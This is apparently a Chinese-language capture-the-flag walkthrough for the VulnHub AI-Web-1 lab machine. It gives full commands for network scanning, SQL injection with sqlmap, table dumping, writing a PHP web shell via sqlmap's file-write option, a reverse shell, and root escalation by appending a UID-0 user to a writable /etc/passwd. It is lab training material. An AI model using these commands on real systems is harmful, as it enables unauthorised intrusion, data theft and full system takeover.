一、环境准备
1.靶机下载
https://www.vulnhub.com/entry/ai-web-1,353/
2.网络配置
kali攻击机和靶机均采用桥接模式,使用手机热点
二、信息收集
1.网络主机发现
sudo arp-scan -l
kali:192.168.110.235
靶机:192.168.110.135
2.目标主机扫描
sudo nmap -sS -sV -O -p- 192.168.110.135
开放端口:80
操作系统:linux
访问80端口,没有东西
3.网站目录扫描
3-1
dirsearch -u http://192.168.110.135/
访问robots.txt
发现两个目录,继续访问
访问失败
3-2
dirsearch -u http://192.168.110.135/m3diNf0/
3-3
dirsearch -u http://192.168.110.135/se3reTdir777
注:这里用dirsearch 扫不出来index.php,用dirb可以
dirb http://192.168.110.135/se3reTdir777
总结:发现info.php, index.php
4.访问目录
info.php
泄露了根路径
index.php
输入1,正常返回:
输入1‘,出现异常,怀疑存在sql注入漏洞:
三、漏洞利用
1、使用burpsuite抓包,并保存为txt文件
2.使用sqlmap验证
2-1
sqlmap -r 1.txt --batch
2-2查数据库
sqlmap -r 1.txt --batch --dbs
2-3查表
2-4查字段
sqlmap -r 1.txt --batch -D aiweb1 -T systemUser --columns
2-5爆破内容
sqlmap -r 1.txt --batch -D aiweb1 -T systemUser -C "id,passwd,userName" --dumps
暂时没看到有用的信息
3.利用sqlmap上传shell
3-1准备一句话木马
3-2写入shell
路径为刚才info.php泄露的根路径
sqlmap -r 1.txt --file-write ./test.php --file-dest /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/test.php
3-3验证shell写入是否成功
已经存在test.php,证明上传成功
4.使用蚁剑连接
无权限查看root内容,下一步需要提权
四、提权
4-1反弹shell
Linux下几种反弹Shell方法的总结与理解 - FreeBuf网络安全行业门户
有些方法可以反弹成功,但是执行命令后没有反应
选用php连接脚本
利用蚁剑上传这个连接脚本
kali开启监听
在虚拟终端执行脚本,kali监听成功
4-2查找可写文件
find / -writable -type f 2>/dev/null
发现可写入/etc/passwd
4-3添加新用户实现提权
生成密码
openssl passwd -1 -salt test 123456
写入/etc/passwd文件中
echo 'newtest:$1$test$at615QShYKduQlx5z9Zm7/:0:0::/root:/bin/bash' >> /etc/passwd
4-4切换用户
出现错误 "must be run from a terminal"
使用" script /dev/null",成功切换
已经是root权限